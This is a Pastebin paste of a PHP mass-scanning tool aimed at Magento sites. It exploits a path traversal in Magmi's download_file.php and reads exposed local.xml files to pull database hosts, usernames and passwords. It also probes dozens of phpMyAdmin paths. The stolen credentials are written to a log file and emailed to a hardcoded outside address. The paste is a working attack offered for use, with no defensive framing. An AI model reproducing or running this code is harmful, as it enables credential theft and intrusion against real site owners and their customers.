Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <form method='post'>
- <textarea name='sites' style="height:250px;width:500px" placeholder="http://www.target.com/ | scan without http/https" ></textarea><br><br>
- <input type='submit' name='go' value='GASCOK'>
- <input type="reset" value="CANCEL">
- </form>
- </div>
- </center>
- <?php
- error_reporting(0);
- set_time_limit(0);
- function get_content($bda){
- return @file_get_contents($bda);
- } function GetStr($start,$end,$string){
- $a = explode($start,$string);
- $b = explode($end,$a[1]);
- return $b[0];
- } function FinderPhpMyAdmin($site) {
- $x = 1;
- $list = array(
- '/phpMyAdmin/',
- '/phpmyadmin/',
- '/PMA/',
- '/pma/',
- '/dbadmin/',
- '/mysql/',
- '/myadmin/',
- '/phpmyadmin2/',
- '/phpMyAdmin2/',
- '/phpMyAdmin-2/',
- '/php-my-admin/',
- '/phpMyAdmin-2.2.3/',
- '/phpMyAdmin-2.2.6/',
- '/phpMyAdmin-2.5.1/',
- '/phpMyAdmin-2.5.4/',
- '/phpMyAdmin-2.5.5-rc1/',
- '/phpMyAdmin-2.5.5-rc2/',
- '/phpMyAdmin-2.5.5/',
- '/phpMyAdmin-2.5.5-pl1/',
- '/phpMyAdmin-2.5.6-rc1/',
- '/phpMyAdmin-2.5.6-rc2/',
- '/phpMyAdmin-2.5.6/',
- '/phpMyAdmin-2.5.7/',
- '/phpMyAdmin-2.5.7-pl1/',
- '/phpMyAdmin-2.6.0-alpha/',
- '/phpMyAdmin-2.6.0-alpha2/',
- '/phpMyAdmin-2.6.0-beta1/',
- '/phpMyAdmin-2.6.0-beta2/',
- '/phpMyAdmin-2.6.0-rc1/',
- '/phpMyAdmin-2.6.0-rc2/',
- '/phpMyAdmin-2.6.0-rc3/',
- '/phpMyAdmin-2.6.0/',
- '/phpMyAdmin-2.6.0-pl1/',
- '/phpMyAdmin-2.6.0-pl2/',
- '/phpMyAdmin-2.6.0-pl3/',
- '/phpMyAdmin-2.6.1-rc1/',
- '/phpMyAdmin-2.6.1-rc2/',
- '/phpMyAdmin-2.6.1/',
- '/phpMyAdmin-2.6.1-pl1/',
- '/phpMyAdmin-2.6.1-pl2/',
- '/phpMyAdmin-2.6.1-pl3/',
- '/phpMyAdmin-2.6.2-rc1/',
- '/phpMyAdmin-2.6.2-beta1/',
- '/phpMyAdmin-2.6.2-rc1/',
- '/phpMyAdmin-2.6.2/',
- '/phpMyAdmin-2.6.2-pl1/',
- '/phpMyAdmin-2.6.3/',
- '/phpMyAdmin-2.6.3-rc1/',
- '/phpMyAdmin-2.6.3/',
- '/phpMyAdmin-2.6.3-pl1/',
- '/phpMyAdmin-2.6.4-rc1/',
- '/phpMyAdmin-2.6.4-pl1/',
- '/phpMyAdmin-2.6.4-pl2/',
- '/phpMyAdmin-2.6.4-pl3/',
- '/phpMyAdmin-2.6.4-pl4/',
- '/phpMyAdmin-2.6.4/',
- '/phpMyAdmin-2.7.0-beta1/',
- '/phpMyAdmin-2.7.0-rc1/',
- '/phpMyAdmin-2.7.0-pl1/',
- '/phpMyAdmin-2.7.0-pl2/',
- '/phpMyAdmin-2.7.0/',
- '/phpMyAdmin-2.8.0-beta1/',
- '/phpMyAdmin-2.8.0-rc1/',
- '/phpMyAdmin-2.8.0-rc2/',
- '/phpMyAdmin-2.8.0/',
- '/phpMyAdmin-2.8.0.1/',
- '/phpMyAdmin-2.8.0.2/',
- '/phpMyAdmin-2.8.0.3/',
- '/phpMyAdmin-2.8.0.4/',
- '/phpMyAdmin-2.8.1-rc1/',
- '/phpMyAdmin-2.8.1/',
- '/phpMyAdmin-2.8.2/',
- '/sqlmanager/',
- '/mysqlmanager/',
- '/p/m/a/',
- '/PMA2005/',
- '/pma2005/',
- '/phpmanager/',
- '/php-myadmin/',
- '/phpmy-admin/',
- '/webadmin/',
- '/sqlweb/',
- '/websql/',
- '/webdb/',
- '/mysqladmin/',
- '/mysql-admin/',
- '/mya/',
- );
- $jumlah = count($list);
- if(isset($site))
- {
- foreach($list as $path => $test)
- {
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HEADER, 1);
- curl_setopt($ch, CURLOPT_URL, $site.$test);
- $result = curl_exec($ch);
- curl_close($ch);
- if (preg_match("/200 OK/", $result)) {
- return $bda.$test;
- break;
- } if (preg_match("/401 Unauthorized/", $result)){
- return $site.$test;
- } else {
- echo "";
- }
- }
- }
- }
- error_reporting(0);
- set_time_limit(0);
- $ya=$_POST['go'];
- $co=$_POST['sites'];
- if($ya){
- $e=explode("\r\n",$co);
- foreach($e as $bda){
- $path = array("Amasty" => "/app/etc/local.xml","Magmi" => "/magmi/web/download_file.php?file=../../app/etc/local.xml");
- echo"<hr color=green>";
- echo "[+] Scanning $bda </font> ";
- foreach($path as $key)
- {
- $http='http://';
- $dn=($http).($bda).($key);
- $lfd=@file_get_contents($dn);
- if(preg_match("/<host><!/",$lfd))
- { echo"<br>";
- $host = GetStr("<host><![CDATA[","]]></host>",$lfd);
- $username = GetStr("<username><![CDATA[","]]></username>",$lfd);
- $password = GetStr("<password><![CDATA[","]]></password>",$lfd);
- $dbname = GetStr("<dbname><![CDATA[","]]></dbname>",$lfd);
- $lfdconfig .= "[+] Exploiting...Succes!!</font><br>";
- $lfdconfig = "[+] Host : $host</font><br>";
- $lfdconfig .= "[+] Username : $username</font><br>";
- $lfdconfig .= "[+] Password : $password</font><br>";
- $lfdconfig .= "[+] DatabaseName : $dbname</font><br>";
- echo $lfdconfig;
- //logger
- $fp = fopen("res_xml.php", 'a');
- fwrite($fp, " ============== SETORAN LOG ==============<br>");
- fwrite($fp, " [+] Site : $bda <br>");
- fwrite($fp, " [+] Host : $host <br>");
- fwrite($fp, " [+] Username : $username <br>");
- fwrite($fp, " [+] Password : $password <br>");
- fwrite($fp, " [+] DBname : $dbname <br>");
- fwrite($fp, " [+] Login : <a href=$bda/$finderPhpmyadmin target=blank> $bda/$finderPhpmyadmin </a><br>");
- fwrite($fp, " ============== RES7OCK CREW ==============<br><br>");
- fclose($fp);
- $to = "resultemail08@gmail.com";
- $subject = "LFD | $bda";
- $email = "LOGMAGENTO";
- $body=" Site : $bda \n Host : $host \n Username : $username \n Password :$password \n DBname : $dbname";
- $headers = 'From: ' .$email . "\n".
- 'X-Mailer: PHP/' . phpversion();
- if (mail($to,$subject,$body,$headers)) {
- echo("");
- }
- }
- }
- }
- $finderPhpmyadmin = FinderPhpMyAdmin("$bda");
- if(isset($finderPhpmyadmin)){
- echo " [+] Path Mysql login : <a href=$bda/$finderPhpmyadmin target=blank> $bda/$finderPhpmyadmin </font> </a>";
- $to = "resultemail08@gmail.com";
- $subject = "LFD | $bda";
- $email = "LOGMAGENTO";
- $body="Login : $bda/$finderPhpmyadmin";
- $headers = 'From: ' .$email . "\n".
- 'X-Mailer: PHP/' . phpversion();
- if (mail($to,$subject,$body,$headers)) {
- echo("");
- }
- echo"<hr color=green> ";
- } else {
- echo "[-] Path Mysql Not found";
- }
- break;
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
